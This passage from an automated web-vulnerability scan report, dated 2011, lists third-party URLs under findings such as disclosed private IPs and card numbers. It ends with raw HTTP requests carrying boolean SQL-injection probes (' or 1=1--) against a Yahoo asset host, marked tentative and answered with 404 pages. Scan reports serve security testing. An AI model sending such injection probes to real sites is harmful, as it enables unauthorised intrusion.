19.55. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
19.59. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
19.60. http://sportdfw.com/aboutcontact-us/
19.61. http://sportdfw.com/img/city/dallas/img/content-email-submit.gif
19.62. http://sportdfw.com/z-the-fort-worth-four/
19.63. http://sports.yahoo.com/nba/expertsarchive
19.64. http://sports.yahoo.com/nba/news
19.65. http://sports.yahoo.com/nba/news
19.66. http://sports.yahoo.com/nba/news
19.67. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
19.68. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
19.69. http://www.facebook.com/plugins/activity.php
19.70. http://www.facebook.com/plugins/comments.php
19.71. http://www.facebook.com/plugins/like.php
19.72. http://www.facebook.com/plugins/likebox.php
19.73. http://www.facebook.com/plugins/recommendations.php
19.74. http://www.facebook.com/widgets/like.php
19.75. http://www.gamershell.com/news_118846.html
19.76. http://www.imdb.com/images/a/ifb/google_afc_labs.html
19.77. http://www.imdb.com/images/a/ifb/pda_comm2.html
19.78. http://www.imdb.com/title/tt0944947/
19.79. http://www.imdb.com/title/tt0944947/_ajax/footer
19.80. http://www.mavgear.com/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
19.83. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
19.84. http://www.mavsmoneyball.com/fanposts
19.85. http://www.mavsmoneyball.com/mavericks-tickets
19.86. http://www.mavsmoneyball.com/mavericks-tickets
19.87. http://www.mavsmoneyball.com/mavericks-tickets
19.88. http://www.nba.com/mavericks/index_main.html
19.89. http://www.nba.com/mavericks/playoffs/2011_nba_finals_champions.html
19.90. http://www.nba.com/video/cvp/teamarticleplayer.html
19.91. http://www.stumbleupon.com/badge/embed/5/
19.92. http://www.twackle.com/
19.93. http://www.twackle.com/fansided/General_Twackle_Widget
19.94. http://www.twackle.com/headlines
19.95. http://www.ugo.com/cm/ugo/js/ugo-global.js
19.96. http://www.ugo.com/xd_receiver.htm
19.97. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js
20.1. http://ads.pubmatic.com/
20.3. http://dg.specificclick.net/
20.5. http://secure-us.imrworldwide.com/
20.6. http://track1000.pubmatic.com/
21.1. http://ads.adbrite.com/adserver/vdi/742697
21.2. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.s20110610a.js
21.3. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/wpaudio.js
21.4. http://img.timeinc.net/tii/omniture/h/common.js
21.5. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/mobileExperience.js
21.6. https://login.yahoo.com/config/login_verify2
21.7. http://mediacdn.disqus.com/1307735099/build/system/disqus.js
21.8. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js
21.9. http://sportdfw.com/aboutcontact-us/
21.10. http://sportdfw.com/wp-content/plugins/wp-recaptcha/recaptcha.css
21.11. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js
21.12. http://thesouthern.com/content/tncms/live/global/resources/scripts/facebox.js
21.13. http://thesouthern.com/content/tncms/live/global/resources/scripts/port-comments.js
21.14. http://thesouthern.com/content/tncms/live/global/resources/styles/skin.css
21.15. http://widgets3.flux.com/Widget/ContentAction/3023/en-US
21.16. http://www.hbo.com/utils/js/jquery/plugins/jquery.cookie.js
21.17. http://www.mavgear.com/skin1/menu.js
21.19. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
21.20. http://www.mavsmoneyball.com/fanposts
21.21. http://www.mavsmoneyball.com/mavericks-tickets
21.22. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml
21.23. http://www.nba.com/js/controls.js
21.24. http://www.nba.com/js/cookieFunctions.js
21.25. http://www.nba.com/js/dragdrop.js
21.26. http://www.twackle.com/
21.27. http://www.twackle.com/headlines
21.28. http://www.twackle.com/javascripts/all.js
22. Private IP addresses disclosed
22.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php
22.2. http://connect.facebook.net/en_US/all.js
22.3. http://desmond.yfrog.com/Himg737/scaled.php
22.4. http://external.ak.fbcdn.net/safe_image.php
22.5. http://external.ak.fbcdn.net/safe_image.php
22.6. http://external.ak.fbcdn.net/safe_image.php
22.7. http://external.ak.fbcdn.net/safe_image.php
22.8. http://external.ak.fbcdn.net/safe_image.php
22.9. http://external.ak.fbcdn.net/safe_image.php
22.10. http://external.ak.fbcdn.net/safe_image.php
22.11. http://external.ak.fbcdn.net/safe_image.php
22.12. http://external.ak.fbcdn.net/safe_image.php
22.13. http://external.ak.fbcdn.net/safe_image.php
22.14. http://external.ak.fbcdn.net/safe_image.php
22.15. http://graph.facebook.com/1599594030/picture
22.16. http://graph.facebook.com/680122358/picture
22.17. http://graph.facebook.com/695375004/picture
22.18. http://graph.facebook.com/701741542/picture
22.19. http://justjared.buzznet.com/favicon.ico
22.20. http://justjared.buzznet.com/favicon.ico
22.21. http://media.expedia.com/ads/travelhook/travelhook.js
22.22. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
22.23. http://static.ak.connect.facebook.com/connect.php
22.24. http://static.ak.connect.facebook.com/connect.php/en_US
22.25. http://static.ak.connect.facebook.com/connect.php/en_US
22.27. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
22.28. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML
22.29. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
22.30. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
22.31. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js
22.32. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js
22.33. http://static.ak.fbcdn.net/connect/xd_proxy.php
22.34. http://static.ak.fbcdn.net/connect/xd_proxy.php
22.35. http://static.ak.fbcdn.net/connect/xd_proxy.php
22.36. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif
22.37. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif
22.38. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/nXqcdeyQ5vr.js
22.39. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js
22.40. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js
22.41. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/XcVjTLuzQ2O.js
22.42. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css
22.43. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/dYwII2uSVbM.css
22.44. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
22.45. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/-uzFkmw0aKD.js
22.46. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/ZwGc6Ghug0y.css
22.47. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/4zEIrWluYBR.css
22.48. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/nIpljRV8xB5.js
22.49. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css
22.50. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js
22.51. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/t4syXsnV4WE.js
22.52. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif
22.53. http://www.facebook.com/extern/login_status.php
22.54. http://www.facebook.com/extern/login_status.php
22.55. http://www.facebook.com/extern/login_status.php
22.56. http://www.facebook.com/extern/login_status.php
22.57. http://www.facebook.com/extern/login_status.php
22.58. http://www.facebook.com/extern/login_status.php
22.59. http://www.facebook.com/extern/login_status.php
22.60. http://www.facebook.com/extern/login_status.php
22.61. http://www.facebook.com/extern/login_status.php
22.62. http://www.facebook.com/extern/login_status.php
22.63. http://www.facebook.com/extern/login_status.php
22.64. http://www.facebook.com/extern/login_status.php
22.65. http://www.facebook.com/extern/login_status.php
22.66. http://www.facebook.com/extern/login_status.php
22.67. http://www.facebook.com/extern/login_status.php
22.68. http://www.facebook.com/extern/login_status.php
22.69. http://www.facebook.com/extern/login_status.php
22.70. http://www.facebook.com/extern/login_status.php
22.71. http://www.facebook.com/plugins/activity.php
22.72. http://www.facebook.com/plugins/comments.php
22.73. http://www.facebook.com/plugins/like.php
22.74. http://www.facebook.com/plugins/like.php
22.75. http://www.facebook.com/plugins/like.php
22.76. http://www.facebook.com/plugins/like.php
22.77. http://www.facebook.com/plugins/like.php
22.78. http://www.facebook.com/plugins/like.php
22.79. http://www.facebook.com/plugins/like.php
22.80. http://www.facebook.com/plugins/like.php
22.81. http://www.facebook.com/plugins/like.php
22.82. http://www.facebook.com/plugins/like.php
22.83. http://www.facebook.com/plugins/like.php
22.84. http://www.facebook.com/plugins/like.php
22.85. http://www.facebook.com/plugins/like.php
22.86. http://www.facebook.com/plugins/like.php
22.87. http://www.facebook.com/plugins/like.php
22.88. http://www.facebook.com/plugins/like.php
22.89. http://www.facebook.com/plugins/like.php
22.90. http://www.facebook.com/plugins/like.php
22.91. http://www.facebook.com/plugins/like.php
22.92. http://www.facebook.com/plugins/like.php
22.93. http://www.facebook.com/plugins/like.php
22.94. http://www.facebook.com/plugins/like.php
22.95. http://www.facebook.com/plugins/like.php
22.96. http://www.facebook.com/plugins/like.php
22.97. http://www.facebook.com/plugins/like.php
22.98. http://www.facebook.com/plugins/like.php
22.99. http://www.facebook.com/plugins/like.php
22.100. http://www.facebook.com/plugins/like.php
22.101. http://www.facebook.com/plugins/like.php
22.102. http://www.facebook.com/plugins/like.php
22.103. http://www.facebook.com/plugins/like.php
22.104. http://www.facebook.com/plugins/like.php
22.105. http://www.facebook.com/plugins/like.php
22.106. http://www.facebook.com/plugins/like.php
22.107. http://www.facebook.com/plugins/like.php
22.108. http://www.facebook.com/plugins/like.php
22.109. http://www.facebook.com/plugins/like.php
22.110. http://www.facebook.com/plugins/like.php
22.111. http://www.facebook.com/plugins/like.php
22.112. http://www.facebook.com/plugins/like.php
22.113. http://www.facebook.com/plugins/likebox.php
22.114. http://www.facebook.com/plugins/likebox.php
22.115. http://www.facebook.com/plugins/likebox.php
22.116. http://www.facebook.com/plugins/likebox.php
22.117. http://www.facebook.com/plugins/likebox.php
22.118. http://www.facebook.com/plugins/likebox.php
22.119. http://www.facebook.com/plugins/likebox.php
22.120. http://www.facebook.com/plugins/likebox.php
22.121. http://www.facebook.com/plugins/likebox.php
22.122. http://www.facebook.com/plugins/recommendations.php
22.123. http://www.facebook.com/plugins/send.php
22.124. http://www.facebook.com/plugins/send.php
22.125. http://www.facebook.com/widgets/like.php
22.126. http://www35.glam.com/gad/glamadapt_jsrv.act
22.127. http://www35.glam.com/gad/glamadapt_jsrv.act
22.128. http://www35.glam.com/gad/glamadapt_jsrv.act
22.129. http://www35.glam.com/gad/glamadapt_jsrv.act
22.130. http://www35.glam.com/gad/glamadapt_jsrv.act
22.131. http://www35.glam.com/gad/glamadapt_jsrv.act
22.132. http://www35.glam.com/gad/glamadapt_jsrv.act
22.133. http://www35.glam.com/gad/glamadapt_jsrv.act
22.134. http://www35.glam.com/gad/glamadapt_jsrv.act
23. Credit card numbers disclosed
23.1. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js
23.2. http://www35.glam.com/gad/glamadapt_jsrv.act
24.1. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11
24.2. http://d.xp1.ru4.com/meta
24.3. http://l.addthiscdn.com/live/t00/250lo.gif
24.4. http://load.exelator.com/load/
24.5. http://m.xp1.ru4.com/meta
24.6. http://matrix.hbo.com/b/ss/hboprod/1/H.20.3/s76848129960708
24.7. http://s.media-imdb.com/twilight/
24.8. http://segment-pixel.invitemedia.com/unpixel
24.9. http://server.cpmstar.com/brilig.aspx
24.10. http://vt.imiclk.com/cgi/vtc.cgi
24.11. http://www.mavgear.com/adaptive.php
25. HTML does not specify charset
25.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925
25.2. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
25.3. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
25.4. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
25.5. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
25.7. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
25.8. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
25.9. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
25.10. http://ad.doubleclick.net/adi/amzn.us.audienceextension/
25.11. http://ad.doubleclick.net/adi/x1.dt/dt2
25.12. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
25.13. http://ad.doubleclick.net/pfadx/fansided_cim/
25.14. http://ad.yieldmanager.com/iframe3
25.15. http://adserver.veruta.com/cookiematch.fcgi
25.16. http://amch.questionmarket.com/adscgen/st.php
25.17. http://bidnw.ru4.com/nf
25.18. http://bn.xp1.ru4.com/nf
25.19. http://bpx.a9.com/amzn/iframe.html
25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs
25.21. http://cdn-bpx.a9.com/amzn/iframe.html
25.22. http://cdn.apture.com/media/html/aptureLoadIframe.html
25.23. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html
25.24. http://creativeby1.unicast.com/script/V3.00/deliver2.html
25.25. http://d13.zedo.com/OzoDB/cutils/R53_5_5/jsc/1190/zpu.html
25.26. http://d3.zedo.com/jsc/d3/ff2.html
25.27. http://d3l3lkinz3f56t.cloudfront.net/dclk1-0.9.html
25.28. http://data.nba.com/data/html/gdyn/gdyn_nba.html
25.29. http://ds.addthis.com/red/psi/sites/idolator.com/p.json
25.30. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php
25.31. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php
25.32. http://fls.doubleclick.net/activityi
25.33. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php
25.34. http://js.adsonar.com/js/pass.html
25.35. http://kotaku.com/static/items/kotaku.com/trackers.html
25.36. http://mediacdn.disqus.com/1307735099/build/system/def.html
25.37. http://mediacdn.disqus.com/1307735099/build/system/reply.html
25.38. http://ping.chartbeat.net/ping
25.39. http://pixel.invitemedia.com/data_sync
25.40. http://platform0.twitter.com/widgets/follow_button.html
25.41. http://ptimeinc.chartbeat.net/ping
25.42. http://showadsak.pubmatic.com/AdServer/AdServerServlet
25.43. http://static.ny.us.criteo.net/empty.html
25.44. http://stats.townnews.com/thesouthern.com/
25.46. http://tags.bluekai.com/site/2312
25.47. http://thesouthern.com/app/port/bulkCommentCount.php
25.48. http://thesouthern.com/app/port/tabMostCommentedJs.php
25.49. http://w55c.net/ct/cms-2-frame.html
25.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/
25.51. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp
25.52. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
25.55. http://www.hbo.com/favicon.ico
25.56. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html
25.57. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
25.58. http://www.imdb.com/images/a/ifb/google_afc_labs.html
25.59. http://www.imdb.com/images/a/ifb/pda_comm2.html
25.60. http://www.imdb.com/title/tt0944947/_ajax/footer
25.61. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml
25.62. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml
25.63. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml
25.64. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml
25.65. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml
25.66. http://www.nba.com/mavericks/
25.67. http://www.nba.com/video/cvp/teamarticleplayer.html
25.68. http://www.oneregion.com/app/calendar/events/js/calWidget.php
25.69. http://www.paperg.com/jsfb/embed.php
25.70. http://www.ugo.com/takeover/takeover.html
25.71. http://www.ugo.com/xd_receiver.htm
26. Content type incorrectly stated
26.1. http://ad.doubleclick.net/pfadx/fansided_cim/
26.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**
26.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**
26.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**
26.5. http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30%20years.jpg
26.6. http://admeld.lucidmedia.com/clicksense/admeld/match
26.7. http://adserv.impactengine.com/www/e9/07/w2/1y/objembed.html/@@1307040897@@
26.8. http://adserver.veruta.com/cookiematch.fcgi
26.9. http://amch.questionmarket.com/adscgen/st.php
26.10. http://api.mixpanel.com/track/
26.11. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json
26.12. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json
26.13. http://api.uproxx.com/ulink/template.js
26.14. http://ar.voicefive.com/b/rc.pli
26.15. http://as.jivox.com/player/jivox_ad_tags.php
26.16. http://as.jivox.com/unit/jivox_unit_tags.php
26.17. http://beacon.videoegg.com/btf
26.18. http://beacon.videoegg.com/initjs
26.19. http://beacon.videoegg.com/invpos
26.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs
26.22. http://cdn.apture.com/media/searchfilter.khtml.v33513556.js
26.23. http://cdn.triggertag.gorillanation.com/js/4600_US.php
26.24. http://cdn2.sbnation.com/profile_images/435869/a7d63d06_small.jpg
26.25. http://cm.npc-lee.overture.com/partner/css/ads.css
26.26. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php
26.27. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php
26.28. http://event.adxpose.com/event.flow
26.29. http://expedia-www.baynote.net/baynote/tags3/common
26.30. http://hollywoodcrush.mtv.com/wp-content/themes/charlie_default/community/flux.inc
26.32. http://l.apture.com/v3/
26.33. http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg
26.34. http://mediacdn.disqus.com/1307735099/fonts/disqus-webfont.woff
26.35. http://moviesblog.mtv.com/wp-content/themes/charlie_default/community/flux.inc
26.36. http://my.yahoo.com/e/df
26.37. http://my.yahoo.com/e/js
26.38. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2
26.39. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f
26.40. http://platform.twitter.com/widgets.js
26.41. http://showadsak.pubmatic.com/AdServer/AdServerServlet
26.42. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll
26.43. http://thesouthern.com/app/port/bulkCommentCount.php
26.44. http://thesouthern.com/app/port/tabMostCommentedJs.php
26.45. http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
26.46. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/
26.47. http://www.buzzfeed.com/favicon.ico
26.48. http://www.expedia.com/daily/js/flash.vbs
26.49. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
26.50. http://www.facebook.com/extern/login_status.php
26.51. http://www.lijit.com/wijit
26.52. http://www.mavgear.com/favicon.ico
26.53. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml
26.54. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml
26.55. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg
26.56. http://www.mtv.com/sitewide/css/charlie/themes/blogs/mtvmoviesblog/bg-tile_1200.gif
26.57. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml
26.58. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml
26.59. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml
26.60. http://www.oneregion.com/app/calendar/events/js/calWidget.php
26.61. http://www.paperg.com/jsfb/embed.php
26.62. http://www.reddit.com/static/spreddit4.gif
26.63. http://www.stumbleupon.com/hostedbadge.php
26.64. http://www2.sesamestats.com/paneltracking.aspx
26.65. http://www24a.glam.com/appdir/resources/rendergadget.js
27. Content type is not specified
27.1. http://ad.yieldmanager.com/st
27.2. http://ads.bluelithium.com/st
27.3. http://www.expedia.com/static/default/default/images/close_button.gif
27.4. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif
27.5. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif
27.6. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif
27.7. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif
27.8. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif
27.9. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png
27.10. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png
27.11. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png
27.12. http://www.meebo.com/cmd/tc
Severity: | High |
Confidence: | Tentative |
Host: | http://as.jivox.com |
Path: | /player/iabplayer.php |
GET /player/iabplayer.php Host: as.jivox.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=UTF-8 Date: Mon, 13 Jun 2011 11:07:41 GMT Expires: Mon, 4 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache/2.2.6 (Fedora) Vary: Accept-Encoding,User X-Powered-By: PHP/5.1.6 Content-Length: 2102 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Jivox Ad Preview ...[SNIP]... k1MzM2NjEsc2kkMjQ1Mj </script> <noscript> <a href="http://clicks.beap <img src="http://jivoxuploads </a> </noscript> </body> </html> |
GET /player/iabplayer.php Host: as.jivox.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=UTF-8 Date: Mon, 13 Jun 2011 11:07:42 GMT Expires: Mon, 4 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache/2.2.6 (Fedora) Vary: Accept-Encoding,User X-Powered-By: PHP/5.1.6 Content-Length: 1956 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Jivox Ad Preview ...[SNIP]... jk1MzM2NjEsc2kkMjQ1M </script> <noscript> <a href="http://clicks.beap <img src="http://jivoxuploads </a> </noscript> </body> </html> |
Severity: | High |
Confidence: | Tentative |
Host: | http://l.yimg.com |
Path: | /j/assets/eJx1UtluwyAQ |
GET /j/assets41506506'%20or%201%3d1-- Host: l.yimg.com Proxy-Connection: keep-alive Referer: http://sports.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:05:26 GMT P3P: policyref="http://info Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Server: YTS/1.19.5 Content-Length: 3807 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://searc ...[SNIP]... 1311&url=Yahoo!+Sports </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
GET /j/assets41506506'%20or%201%3d2-- Host: l.yimg.com Proxy-Connection: keep-alive Referer: http://sports.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:05:26 GMT P3P: policyref="http://info Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Server: YTS/1.19.5 Content-Length: 3780 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://searc ...[SNIP]... ericks_win_nba_finals </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://l.yimg.com |
Path: | /j/assets/eJx9UtuOgyAU |
GET /j/assets19026485'%20or%201%3d1-- Host: l.yimg.com Proxy-Connection: keep-alive Referer: http://sports.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:06:23 GMT P3P: policyref="http://info Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Server: YTS/1.19.5 Content-Length: 3740 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://searc ...[SNIP]... ws%3Fslug%3Daw-wojna </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
GET /j/assets19026485'%20or%201%3d2-- Host: l.yimg.com Proxy-Connection: keep-alive Referer: http://sports.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
